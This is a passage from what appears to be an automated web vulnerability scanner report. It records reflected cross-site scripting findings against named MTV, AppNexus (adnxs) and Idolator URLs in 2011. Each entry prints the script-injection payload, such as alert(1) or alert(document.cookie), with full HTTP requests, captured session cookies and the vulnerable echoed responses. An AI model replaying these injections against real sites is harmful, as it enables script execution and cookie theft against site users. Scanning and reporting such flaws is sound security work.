GET /favicon.ico4bc7e</script><script>alert(1)</script>4e5acb99ae0 HTTP/1.1
Host: hollywoodcrush.mtv.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; mbox=check#true#1307963954|session#1307963884869-321358#1307965754; __cs_rr=1

Response

HTTP/1.1 404 Not Found
Server: Apache/2
X-Powered-By: PHP/5.2.8
X-Pingback: http://hollywoodcrush.mtv.com/xmlrpc.php
Last-Modified: Mon, 13 Jun 2011 11:23:04 GMT
Pragma: no-cache
X-Cache-Term: short
Content-Type: text/html; charset=UTF-8
Content-Length: 28173
Cache-Control: must-revalidate, max-age=600
Expires: Mon, 13 Jun 2011 11:33:04 GMT
Date: Mon, 13 Jun 2011 11:23:04 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head
...[SNIP]...
<script type="text/javascript">
mtvn.btg.Controller.sendPageCall( {
    pageName: 'BLOGS/hollywoodcrush/favicon.ico4bc7e</script><script>alert(1)</script>4e5acb99ae0',
    channel: 'BLOGS',
    hier1: 'BLOGS/hollywoodcrush/favicon.ico4bc7e</script>
...[SNIP]...

4.132. http://ib.adnxs.com/ab [ccd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the ccd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f62e6'-alert(1)-'6d4ad6d0366 was submitted in the ccd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=9z3qr1e4EkD3PeqvV7gSQAAAAGBmZgJA9z3qr1e4EkD3PeqvV7gSQPrUl4kdQRoN_ayDGovBdy8O7vVNAAAAAIwuAAC1AAAANQEAAAIAAABnowUA0WMAAAEAAABVU0QAVVNEANQBPAAzC1gAZg8BAgUCAQQAAAAA_iM6CAAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+15288%2C+1307962894%29%3Buf%28%27r%27%2C+369511%2C+1307962894%29%3Bppv%2811776%2C+%27944138667005826298%27%2C+1307962894%2C+1310554894%2C+62058%2C+25553%29%3B&cnd=!lyFsawjq5AMQ58YWGAAg0ccBMAA4sxZAAEi1AlAAWABgVWgAcAJ49P0CgAFQiAHG5wKQAQGYAQGgAQOoAQOwAQG5AZDaLMJXuBJAwQGQ2izCV7gSQMkBCkQTNEFHAEDQAQDZAQAAAAAAAPA_4AEA&ccd=!fgW-Lgjq5AMQ58YWGNHHASAAf62e6'-alert(1)-'6d4ad6d0366&referrer=http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/&pp=TfXuDgADVm8K5X-LihNCfUBjKMj687om75Nzlg&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB5XEjDu71Te-sDYv_lQf9hM3QCO_675oCp537xBr7546PDAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi05ODUzNzg0NjA2NTUxMzk3sgEMc3BvcnRkZncuY29tugEJNDY4eDYwX2FzyAEJ2gFCaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvmAKyD8ACBMgCq4KlDuACAOoCD0ZhbnNpZGVkXzQ2OHg2MKgDAegDiALoA9Mp6AOCAugDtQj1AwAAAMTgBAGABsCL7IGHsaCMNQ%26num%3D1%26sig%3DAGiWqtwD3vBQX40UZMj4tjEt-VoEhYeEGQ%26client%3Dca-pub-9853784606551397%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; uuid2=3420415245200633085; anj=Kfw)k>Mwz%)J70wBHz-D7`qokXhj-@aM)mVXjqrslj5ft[)'1yw[xphJSdzG.TF)0F^A`]BqTl-AR6`*)JP0AKozxfQE4@ZTQjq]rNTTlKqs3KL4-O(L$OYY]n=Fu!v//qc@$i3nq2_[o`94GmWdO0Bz@eLc*.`71nO<Z_$Uxo7CpH?*'y[3gS*4MLCLAUc5@r?XLOuqcg3M`mO_*!5UYGU#5(`mbnnx=hxk+]^04kmIQ5/@lg3[`MT!_-w*dO:K^3w5%z!c>wK::6cWF*>:oKm$@GTp*rMP#jcMyL@J[#@Cw65Eqv_>#V3r[J%[*<nKa<)Dn:*DWFX/5bNa8/+1*a#%MWnd*jrwZ[1nMujHwh48)Z_%aTTSWZ1=0MnH*f'UZlnAC]m)AUJ1(vbuE)$j2*'0!a['V8vZ4ig*C97YN3(WOPh_iGuYQ!7TBWIbIoOd9wMWuHVt1.@*tY/VH(3_aDA)y3PeL%fXVg0G'DDqj$WKSBU(?m1yqaoI^uXpwU1I^tKHQr3H.(X_0cm=y<=oa6_f*J4o)vR.yk*^]OC7`ZJ_K6qd<*VTIw_U`OL)YNc')g%2>I5$1(o1ikX@zjIkO?y1qMGFZ!G1`I!!!!!

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:02:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:02:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; path=/; expires=Sun, 11-Sep-2011 11:02:21 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 13 Jun 2011 11:02:21 GMT
Content-Length: 1087

document.write('<a href="http://ib.adnxs.com/click/hetRuB6F_z-F61G4HoX_PwAAAGBmZgJA9z3qr1e4EkD3PeqvV7gSQPrUl4kdQRoN_ayDGovBdy8O7vVNAAAAAIwuAAC1AAAANQEAAAIAAABnowUA0WMAAAEAAABVU0QAVVNEANQBPAAzC1gAZg8BAgUCAQQAAAAAViRkLAAAAAA./cnd=!fgW-Lgjq5AMQ58YWGNHHASAAf62e6'-alert(1)-'6d4ad6d0366/referrer=http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB5XEjDu71Te-sDYv_lQf9hM3QCO_675oCp537
...[SNIP]...

4.133. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81d22'%3balert(1)//9572c2aecfb was submitted in the redir parameter. This input was echoed as 81d22';alert(1)//9572c2aecfb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=514&size=728x90&referrer=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert(document.cookie)-%25225958ea17fd2=1&inv_code=748066&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D748066%26r%3D1%26_salt%3D1188639314%26u%3Dhttp%253A%252F%252Fthesouthern.com%252Fsports%252Fbasketball%252Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%253Fc03b0%252522-alert%2528document.cookie%2529-%2525225958ea17fd2%253D1%26u%3Dhttp%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D181d22'%3balert(1)//9572c2aecfb HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:20:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:20:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb142304=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIs34QChgBIAEoATCP5NfvBAoSCMmhAxAKGAMgAygDMIbl1-8EEIbl1-8EGAM.; path=/; expires=Sun, 11-Sep-2011 11:20:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb830492=![nC'kI/7Z208jSAtaS(d]iDt?enc=9inHZHH_8D_vYB_4c-XsPwAAAKCZmQFA72Af-HPl7D_2Kcdkcf_wPyux69QhF0By_ayDGovBdy-G8vVNAAAAAMf7BwACAgAANQEAAAIAAABqowUADB8BAAEAAABVU0QAVVNEANgCWgDwAgAAPRABAgUCAQUAAAAAzieUmQAAAAA.&tt_code=748066&udj=uf%28%27a%27%2C+15288%2C+1307964038%29%3Buf%28%27r%27%2C+369514%2C+1307964038%29%3Bppv%2811776%2C+%278232605552906842411%27%2C+1307964038%2C+1310556038%2C+62058%2C+73484%29%3B&cnd=!oyV-jgjq5AMQ6sYWGAAgjL4EMAA48AVAAEi1AlDH9x9YAGBVaABwBHgMgAGoAYgBAJABAZgBAaABA6gBA7ABAbkBAZauyHH_8D_BAQGWrshx__A_yQGI_C6Qt-feP9ABANkBAAAAAAAA8D_gAQA.&ccd=!NgVlLQjq5AMQ6sYWGIy-BCAA; path=/; expires=Tue, 14-Jun-2011 11:20:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)k=m<8a)J710Kt5aQ:PPuz.Z_6mg=p)#A_CV1L8mL#XXrY@'%SJv4c_/-XRX^M#>#0@[1jepIJI6E8zF'H=%jtH^_1VW)f3]4l%1@Sm@vnGn?R**s'RplLm%kx_bK:q5l>ivpnm-LKN$GN@x+lNA5Cuikkj7sn9xm]`J=KC.=:^:VjY4M_zK72^kT0P8PJlB'gmMTqPZD]i:/2(LP@ZSDJtjsMnWaZ_[%R'BsAFw7w[MS41A09JtN^8-H_wg%57bUOx*lC*-725*??#YJ5eAI2^O^zte(BohUm_LMr!yNlWER*tFuZZq[XP'u*=#$sbT9ivHo^PgNdv*Cw-Ffdc^N3wB-0>@mKd%9Jc:3LoP*`5_626$/u@vn]fbDK5wJL9BA4*S9vZ986)u@Iw8?KjY+Vo97wwNlttsp@d_`YZx-4qr:P.brt+'Y$lt'L$Czp#-`/AY=zpFTmxS$35Me3n0^t?5IFGts<P[dM>5G@OLkg6>h$@H0nFCD5tbki%.rk04x9h/#MPo(n:.)#)rC^.#X4Vk2Pi!(!wv*jbFzW>a59$ZSM*M%mnE)@T+zK(ngDPUnQ*fT(7V]5/mJ`I5u-sA4+<`%@kF>`GsZzMR=VXcl7:@#pmk]F9Y$]JJ59?0*vMgv$u'Q.*M^5m8SJM3BW%w/); path=/; expires=Sun, 11-Sep-2011 11:20:38 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 13 Jun 2011 11:20:38 GMT
Content-Length: 640

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/imp?anmember=514&anprice=90&Z=728x90&s=748066&r=1&_salt=1188639314&u=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball
...[SNIP]...
Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D1&u=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=181d22';alert(1)//9572c2aecfb">
...[SNIP]...

4.134. http://idolator.com/ifb/audience-science.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /ifb/audience-science.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c73f"><script>alert(1)</script>40fd068c3fa was submitted in the REST URL parameter 1. This input was echoed as 2c73f\"><script>alert(1)</script>40fd068c3fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ifb2c73f"><script>alert(1)</script>40fd068c3fa/audience-science.html HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:24 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35850
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/ifb2c73f\"><script>alert(1)</script>40fd068c3fa/audience-science.html" />
...[SNIP]...

4.135. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed9e7"><script>alert(1)</script>94f63fa15e9 was submitted in the REST URL parameter 1. This input was echoed as ed9e7\"><script>alert(1)</script>94f63fa15e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contented9e7"><script>alert(1)</script>94f63fa15e9/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:03 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-contented9e7\"><script>alert(1)</script>94f63fa15e9/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js?ver=2.8.6" />
...[SNIP]...

4.136. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83a1b"><script>alert(1)</script>3876fc04fe was submitted in the REST URL parameter 2. This input was echoed as 83a1b\"><script>alert(1)</script>3876fc04fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins83a1b"><script>alert(1)</script>3876fc04fe/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:15 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36002
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins83a1b\"><script>alert(1)</script>3876fc04fe/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js?ver=2.8.6" />
...[SNIP]...

4.137. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 619b8"><script>alert(1)</script>b699cc3cd3e was submitted in the REST URL parameter 3. This input was echoed as 619b8\"><script>alert(1)</script>b699cc3cd3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets619b8"><script>alert(1)</script>b699cc3cd3e/js/ajaxupload.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:24 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets619b8\"><script>alert(1)</script>b699cc3cd3e/js/ajaxupload.js?ver=2.8.6" />
...[SNIP]...

4.138. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3319d"><script>alert(1)</script>8214a7bd60d was submitted in the REST URL parameter 4. This input was echoed as 3319d\"><script>alert(1)</script>8214a7bd60d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js3319d"><script>alert(1)</script>8214a7bd60d/ajaxupload.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:36 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js3319d\"><script>alert(1)</script>8214a7bd60d/ajaxupload.js?ver=2.8.6" />
...[SNIP]...

4.139. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51b1"><script>alert(1)</script>fb71d8fe0e8 was submitted in the REST URL parameter 5. This input was echoed as b51b1\"><script>alert(1)</script>fb71d8fe0e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.jsb51b1"><script>alert(1)</script>fb71d8fe0e8?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

